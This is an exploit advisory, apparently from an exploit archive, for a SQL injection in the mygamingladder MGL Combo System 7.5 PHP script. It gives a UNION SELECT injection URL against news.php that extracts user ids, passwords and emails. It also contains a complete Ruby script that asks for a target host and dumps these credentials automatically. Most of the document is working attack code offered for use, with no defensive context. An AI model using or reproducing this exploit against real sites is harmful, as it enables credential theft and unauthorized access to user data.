mgl75-sql.txt
Posted on 12 April 2010
----------------------------Information------------------------------------------------ +Name : mygamingladder MGL Combo System <= 7.5 SQL injection Vulnerability & SQL injection Exploit +Autor : Easy Laster +Date : 10.04.2010 +Script : mygamingladder MGL Combo System <= 7.5 +Download : ------------------ +Demo : http://www.mygamingladder.com/upgrade/combo/ +Price : 120$ +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project 4004-security-project.com +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://www.site.com/game/news.php?newsid= +Exploitable : http://www.site.com/game/news.php?newsid=1'/**/UNION/**/SELECT+1, concat(id,0x3a,pass,0x3a,email),3,4/**/from/**/users/**/WHERE/**/id=1--+ ----------------------------------------------------------------------------------------- #Exploit #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print " ######################################################### # 4004-Security-Project # ######################################################### # mygamingladder MGL Combo System 7.5 # # Exploit # # Using Host+Path # # www.demo.de /forum/ # # Easy Laster # ######################################################### " require 'net/http' print "#########################################################" print " Enter host name (site.com)->" host=gets.chomp print "#########################################################" print " Enter script path (/forum/)->" path=gets.chomp print " #########################################################" begin dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,id,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print " id -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,pass,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print " password -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "news.php?newsid=1%27/**/UNION/**/SELECT+1,concat(0x23,0x23,0x23,0x23,0x23,email,0x23,0x23,0x23,0x23,0x23),3,4/**/from/**/users--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print " Email -> "+(/#####(.+)#####/).match(resp.body)[1] print " #########################################################" rescue print " Exploit failed" end
